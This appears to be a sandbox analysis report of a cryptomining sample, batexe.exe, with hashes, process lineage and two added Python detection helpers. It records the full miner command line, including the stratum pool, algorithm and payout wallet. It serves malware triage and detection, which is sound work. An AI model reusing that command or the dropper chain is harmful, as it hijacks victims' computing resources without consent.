Analysis
- max time kernel: 299s
- max time network: 304s
- platform: windows10-2004_x64
- resource: win10v2004-20231215-ja
- resource tags: arch:x64, arch:x86, image:win10v2004-20231215-ja, locale:ja-jp, os:windows10-2004-x64, system:windows
- submitted: 19-02-2024 14:09

Behavioral tasks
- behavioral1: sample batexe.exe, resource win10-20240214-ja
- behavioral2: sample batexe.exe, resource win10v2004-20231215-ja

General
- Target: batexe.exe
- Size: 9.4MB
- MD5: cdc9eacffc6d2bf43153815043064427
- SHA1: d05101f265f6ea87e18793ab0071f5c99edf363f
- SHA256: 73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
- SHA512: fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
- SSDEEP: 196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
- Checks computer location settings (2 TTPs, 2 IoCs)
  Looks up the country code configured in the registry, likely a geofence check.
    Key value queried  \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation  batexe.exe
    Key value queried  \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation  b2e.exe
  Both the outer executable and the extracted stub read the same value, which suggests the lookup belongs to the wrapper runtime rather than to the batch payload; treat it as a weak geofence indicator on its own.
- Executes dropped EXE (2 IoCs)
    PID 3144  b2e.exe
    PID 5708  cpuminer-sse2.exe
- Loads dropped DLL (5 IoCs)
    PID 5708  cpuminer-sse2.exe  (5 loads; the DLL paths are not recorded in this view)
- YARA match: upx
    resource behavioral2/memory/2396-9-0x0000000000400000-0x000000000393A000-memory.dmp
    (the rule fired on a memory dump of PID 2396, i.e. batexe.exe itself carries a UPX-packed image)
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious use of WriteProcessMemory (8 IoCs)
    PID 2396 (batexe.exe)  wrote to memory of  PID 3144  procid_target 81  (x3)
    PID 3144 (b2e.exe)     wrote to memory of  PID 2740  procid_target 82  (x3)
    PID 2740 (cmd.exe)     wrote to memory of  PID 5708  procid_target 85  (x2)
  Each writer is the creator of the target process and every write is into a child that is being started, so these IoCs record process lineage (a parent writing the initial memory of its new child) rather than injection into an unrelated process.
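The WriteProcessMemory IoCs above are the only place in this report that ties each PID to its creator, and the sandbox repeats the same line once per write, so a triage script has to deduplicate them before it can draw the process tree. The following is an added example (not part of the sandbox report or of any vendor tooling) that parses those eight lines, collapses the repeats into parent-child edges, and walks a leaf PID back to the root. The input text is constructed from the IoCs on this page; the `names` argument exists only because a leaf that never spawned anything has no image name in this data.

```python
import re
from collections import OrderedDict

# Constructed input: the eight "Suspicious use of WriteProcessMemory" IoCs from
# the report above, one per line, in the sandbox's flattened column order
# (description, pid, process, procid_target). Nothing here is fetched live.
WPM_IOCS = """\
PID 2396 wrote to memory of 3144 2396 batexe.exe 81
PID 2396 wrote to memory of 3144 2396 batexe.exe 81
PID 2396 wrote to memory of 3144 2396 batexe.exe 81
PID 3144 wrote to memory of 2740 3144 b2e.exe 82
PID 3144 wrote to memory of 2740 3144 b2e.exe 82
PID 3144 wrote to memory of 2740 3144 b2e.exe 82
PID 2740 wrote to memory of 5708 2740 cmd.exe 85
PID 2740 wrote to memory of 5708 2740 cmd.exe 85
"""

WPM_RE = re.compile(
    r"^PID (?P<src>\d+) wrote to memory of (?P<dst>\d+) "
    r"(?P<pid>\d+) (?P<image>\S+) (?P<target>\d+)$"
)


def parse_wpm(text):
    """Collapse the IoC lines into (src_pid, src_image, dst_pid, count) edges.

    Identical lines repeat because a parent makes several WriteProcessMemory
    calls while creating one child; they are a single parent->child edge, so
    they are counted rather than listed. Lines that do not match are skipped.
    """
    edges = OrderedDict()
    for line in text.splitlines():
        m = WPM_RE.match(line.strip())
        if not m:
            continue
        key = (int(m["src"]), m["image"], int(m["dst"]))
        edges[key] = edges.get(key, 0) + 1
    return [(s, img, d, n) for (s, img, d), n in edges.items()]


def lineage(edges, leaf_pid):
    """Follow parent links from leaf_pid up to the root; returns PIDs root-first.

    A PID that is nobody's child is its own root. The seen-set stops the walk
    if the edges ever form a cycle (PID reuse in a long run), which would
    otherwise loop forever.
    """
    parent = {d: s for s, _img, d, _n in edges}
    chain = [leaf_pid]
    seen = {leaf_pid}
    while chain[-1] in parent and parent[chain[-1]] not in seen:
        p = parent[chain[-1]]
        seen.add(p)
        chain.append(p)
    return list(reversed(chain))


def render_chain(edges, leaf_pid, names=None):
    """Render the lineage as 'image(pid) -> ...'.

    Image names come from the edges' source column; a leaf that spawned nothing
    has no name there, so `names` lets the caller supply it (here taken from
    the Processes section of the report).
    """
    known = {s: img for s, img, _d, _n in edges}
    known.update(names or {})
    return " -> ".join(f"{known.get(p, '?')}({p})" for p in lineage(edges, leaf_pid))


if __name__ == "__main__":
    e = parse_wpm(WPM_IOCS)
    for src, img, dst, n in e:
        print(f"{img}({src}) -> {dst}  [{n} WriteProcessMemory IoCs]")
    print(render_chain(e, 5708, {5708: "cpuminer-sse2.exe"}))
```

Run as-is it prints three edges (counts 3, 3 and 2) and the chain batexe.exe(2396) -> b2e.exe(3144) -> cmd.exe(2740) -> cpuminer-sse2.exe(5708), which is the same tree the Processes section draws by indentation.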
Processes
1. C:\Users\Admin\AppData\Local\Temp\batexe.exe  (PID 2396)
   Command line: "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
   - Checks computer location settings
   - Suspicious use of WriteProcessMemory
   2. C:\Users\Admin\AppData\Local\Temp\F637.tmp\b2e.exe  (PID 3144)
      Command line: "C:\Users\Admin\AppData\Local\Temp\F637.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\F637.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
      - Checks computer location settings
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory
      3. C:\Windows\SysWOW64\cmd.exe  (PID 2740)
         Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\88.tmp\batchfile.bat" "
         - Suspicious use of WriteProcessMemory
         4. C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe  (PID 5708)
            Command line: cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
            - Executes dropped EXE
            - Loads dropped DLL

Reading the tree: batexe.exe writes a stub (b2e.exe) and a batch script into per-run folders under %TEMP%, starts the stub with its own path as an argument, the stub runs the script through cmd.exe /c, and the script launches cpuminer-sse2.exe. That layout is consistent with a Bat To Exe style wrapper: the submitted "sample" is a compiled batch file, and the part worth detecting is the miner launch. Two details are easy to miss. The image path of cmd.exe is C:\Windows\SysWOW64\cmd.exe even though the command line names system32; that is WOW64 file-system redirection, so b2e.exe is a 32-bit process. And the miner command line carries the operator's whole configuration: the yespower algorithm, the zpool.ca stratum endpoint on TCP port 6234, the payout wallet as the stratum username (a 34-character, D-prefixed address of the Dogecoin format, with the password c=doge selecting the payout coin) and 3 worker threads. The "4" that follows "-t 3" in the raw dump is the tree-depth marker, not part of the option.
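The miner command line above is the highest-value artifact in this report: the pool host, port, algorithm, wallet and thread count are all sitting in argv, so a detection can be written against the command line alone without waiting for network telemetry. The following is an added example (not part of the sandbox report, and not cpuminer's or any vendor's code) that parses a cpuminer-style command line into those fields and then lists which miner heuristics fire. The input is the PID 5708 command line as recorded on this page; the algorithm list and the stratum scheme set are illustrative assumptions to extend, and the "c=" payout selector check follows the zpool convention seen in this sample.

```python
import re
import shlex
from urllib.parse import urlsplit

# Constructed input: the command line of PID 5708 from the process tree above,
# exactly as the sandbox recorded it.
MINER_CMDLINE = (
    "cpuminer-sse2.exe -a yespower "
    "-o stratum+tcp://yespower.sea.mine.zpool.ca:6234 "
    "--userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3"
)

# Illustrative, non-exhaustive set of CPU-mineable algorithm names accepted by
# cpuminer-opt / xmrig style miners (assumption: extend for your environment).
# Only "yespower" appears in this report.
CPU_MINING_ALGOS = {"yespower", "yespowerr16", "yescrypt", "scrypt", "sha256d",
                    "randomx", "cryptonight", "argon2d"}
STRATUM_SCHEMES = {"stratum", "stratum+tcp", "stratum+ssl", "stratum+tcps", "stratum2+tcp"}
# Base58 alphabet (no 0, O, I, l); 25-36 chars covers BTC/LTC/DOGE-style addresses.
BASE58_ADDR = re.compile(r"[1-9A-HJ-NP-Za-km-z]{25,36}")


def _pool(url):
    p = urlsplit(url)
    return {"scheme": p.scheme, "host": p.hostname, "port": p.port}


def parse_miner_cmdline(cmdline):
    """Pull the fields an analyst wants out of a cpuminer-style command line.

    Handles both "--opt value" and "--opt=value" spellings and the -O/--userpass
    "user:pass" shorthand. Unknown options are ignored rather than raising, so a
    truncated or unusual line still yields whatever could be recovered.
    """
    # posix=False keeps Windows backslashes intact; surrounding quotes are then
    # stripped by hand.
    argv = [t.strip('"') for t in shlex.split(cmdline, posix=False)]
    cfg = {"image": argv[0] if argv else None, "algo": None, "pool": None,
           "user": None, "password": None, "threads": None}
    i = 1
    while i < len(argv):
        tok, nxt, step = argv[i], None, 1
        if tok.startswith("--") and "=" in tok:
            tok, nxt = tok.split("=", 1)
        elif i + 1 < len(argv):
            nxt, step = argv[i + 1], 2
        if tok in ("-a", "--algo"):
            cfg["algo"] = nxt
        elif tok in ("-o", "--url"):
            cfg["pool"] = _pool(nxt) if nxt else None
        elif tok in ("-u", "--user"):
            cfg["user"] = nxt
        elif tok in ("-p", "--pass"):
            cfg["password"] = nxt
        elif tok in ("-O", "--userpass") and nxt:
            cfg["user"], _, cfg["password"] = nxt.partition(":")
        elif tok in ("-t", "--threads") and nxt and nxt.isdigit():
            cfg["threads"] = int(nxt)
        else:
            step = 1  # unknown flag: do not swallow the token after it
        i += step
    return cfg


def miner_indicators(cfg):
    """Return the reasons a parsed command line looks like a crypto miner.

    Each heuristic is independent, so a line that hides some fields still
    scores on the rest; an empty list means nothing fired.
    """
    reasons = []
    pool = cfg["pool"] or {}
    if pool.get("scheme") in STRATUM_SCHEMES:
        reasons.append(f"stratum pool {pool['host']}:{pool['port']}")
    if cfg["algo"] in CPU_MINING_ALGOS:
        reasons.append(f"CPU mining algorithm {cfg['algo']}")
    if cfg["user"] and BASE58_ADDR.fullmatch(cfg["user"]):
        reasons.append("wallet-address-shaped pool username")
    if cfg["password"] and cfg["password"].lower().startswith("c="):
        reasons.append(f"zpool-style payout coin selector {cfg['password']}")
    return reasons


if __name__ == "__main__":
    cfg = parse_miner_cmdline(MINER_CMDLINE)
    print(cfg)
    for reason in miner_indicators(cfg):
        print(" -", reason)
```

On the sample's command line all four heuristics fire; on an ordinary cmd.exe /c line none do, and the parser's refusal to treat an unknown flag's neighbour as a value keeps it from mis-attributing script paths. The stratum and wallet checks are the ones that survive a renamed binary or an unusual algorithm name, so weight them highest if this is turned into a rule.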
Network
MITRE ATT&CK Enterprise v15
Downloads
Each entry is one file written during the run, identified by hash only (file names are not recorded in this view).
1. Filesize: 136B
   MD5:    8ea7ac72a10251ecfb42ef4a88bd330a
   SHA1:   c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
   SHA256: 65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
   SHA512: a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
2. Filesize: 6.9MB
   MD5:    171891a8adf847249af2c516550384c3
   SHA1:   241e8963e767dc91fb1ec738ce9bdb3081ade6b0
   SHA256: 7e3048ce9943fb0cb9bf1c23fe1a1676d52cc99ae650a6781be26facccac5fff
   SHA512: 4ae99d737e4f584f5a6b82229bf4c24abad3afee273c6115dcdc74b2d9ed56d13a0aac714192d8e477c38f896e7c5696f6b10d0f9c4d3aaf54c16918ddd0e6da
3. Filesize: 2.6MB
   MD5:    64d755715f1c5d6c853e3bac99f37d2d
   SHA1:   490635e724ad5eb7dd7c4e64f1b8f8db65b18bf7
   SHA256: 40fe4f48290042bf3c5919937008e28461a22a27a8e66caf40313f875ed726c6
   SHA512: 6d8ccb5cf0c8cf26b8a1981ccbdfa3cb49506f7c4f03f24c8471fdb1b3a8b1c312509b054c2112a32165b1bead97bb1f4efe44b031211db8e440e9c0a2dfdb4b
4. Filesize: 2.6MB
   MD5:    f39e075a3b06c0959c3e6737a5f8b61b
   SHA1:   70acaffc9a68e68c08aa4d5f4e7a8558d25c90ce
   SHA256: 82d60182222aea29938394d46674a1273b4c36bc2128eda5d1e51d73c75f5a32
   SHA512: 5aafae17479f96d0da92f5d3f19fca813e316e5aeea234a3bf247bed0f5aa713a9dcf7503daee6a3dc5a6d2ac358bc14d8df1400a0ac247c7793fea0905c7326
5. Filesize: 1.5MB
   MD5:    7af1d3271ef5bf2b1fd29918d8b9922d
   SHA1:   038b8b6ef87dbff71cc0ae740671f9cdbed25944
   SHA256: f2d997ea4ca000ba975777b9a5b9e90be401a7d4d4cb2cd20e67583939999cba
   SHA512: ad0672a9fab77825b1b5486a92f68133b2d91637296add9ee240ca4492e1d2e26b182f284becfe48849273cddff64be85253b8a0ac7081585a53cefc4f0125d9
6. Filesize: 1.5MB
   MD5:    1425399e04d7f5ba0a288a42641d82c7
   SHA1:   247fcd2fc199f111a4e2e6b5e0923474550285ff
   SHA256: 8c661b9bde222da8ad5507debbaf869918b37d96a847e1631b4b328ec26ba6dd
   SHA512: 7f6033b9ac054946e69cc7a4d0fbae37df8515191649105400c6a7cafefa6a8eda44b743a290f2a7a3d9038f41bc1588496fe74f4028dc08c569f55b75cd9b26
7. Filesize: 836KB
   MD5:    aeab40ed9a8e627ea7cefc1f5cf9bf7a
   SHA1:   5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8
   SHA256: 218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9
   SHA512: c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8
8. Filesize: 1.2MB
   MD5:    7cf672bee2afba2dcd0c031ff985958e
   SHA1:   6b82a205db080ffdcb4a4470fce85a14413f3217
   SHA256: c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05
   SHA512: 3e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5
9. Filesize: 1.8MB
   MD5:    ede12298f008ac2303b101ffd5c99181
   SHA1:   b4944ea68398a1fc0972e7c5757060f00ea8e800
   SHA256: 89516e7be3ee574c335bb87fa9ae1d16afe583ebeed8f60d9c45f45d261f1a01
   SHA512: 0677228c0a9ff52257c3a2d573dead9d4974efee8d03ec1f35a6062cdce1d9bcada6f857ac3f6942d406a1183ebeb1e3c520194872f4dbc330a9687dd65cf84a
10. Filesize: 1.1MB
    MD5:    df57c2649135e22278b38d92f7a60383
    SHA1:   fefde9dcbf38546a2c9a16258300da3960f1c44b
    SHA256: cead9362c701e579596dd188d5b6397176fb88a37d2c404a5a07e03d50b11e85
    SHA512: a233a6d07cc01283f7b768a7b79bdd016d02522377acaae748f1513874c05641566433e1ba1b0c4f9a27a23e096d7c6ef1afc214d9810ebb5ba155ef4d605503
11. Filesize: 1.4MB
    MD5:    e514aba24d902e9258fbbe3c471d6eaf
    SHA1:   b671f74533f4b43587fec6fdcd49094cb340ffda
    SHA256: ec943efbae6d2326e46de7fdd2abd641b5da242621522c9edc1b308ea11b320c
    SHA512: 437bd8e20ef45de43723bb11c4a29b2a11902d10ff1983dde253be8d5cf7f88c097ecbd41aa58738086b2a60c1ea9341a5ad35d30326896b255a82aa69485445
12. Filesize: 606KB
    MD5:    585efec1bc1d4d916a4402c9875dff75
    SHA1:   d209613666ccac9d0ddab29a3bc59aa00a0968fa
    SHA256: 2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232
    SHA512: b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770